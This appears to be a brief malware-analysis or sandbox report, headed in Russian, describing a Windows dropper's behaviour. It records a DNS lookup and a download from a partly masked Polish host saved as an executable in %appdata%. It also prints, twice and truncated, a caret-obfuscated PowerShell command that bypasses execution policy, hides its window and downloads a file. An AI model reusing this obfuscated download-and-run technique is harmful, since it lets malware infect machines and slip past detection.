Техническая информация
- http://lt##.##strecord93.pl/file/hon.vfr как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oweRsHELL.^Exe ^-E^XEcutI^OnP^o^lIC^y^ By^PASs ^-nop^R^o^fi^LE^ -wi^N^doWsTyLE HiD^D^eN^ (^New^-^O^bjECt^ sYsTe^M^.nE^T.wE^bC^li^E^nt)^.DoW^NlOa^D^F^IlE('http://lt##.##s...
- DNS ASK lt##.##strecord93.pl
- '<SYSTEM32>\cmd.exe' /c "P^oweRsHELL.^Exe ^-E^XEcutI^OnP^o^lIC^y^ By^PASs ^-nop^R^o^fi^LE^ -wi^N^doWsTyLE HiD^D^eN^ (^New^-^O^bjECt^ sYsTe^M^.nE^T.wE^bC^li^E^nt)^.DoW^NlOa^D^F^IlE('http://lt##.##s...' (со скрытым окном)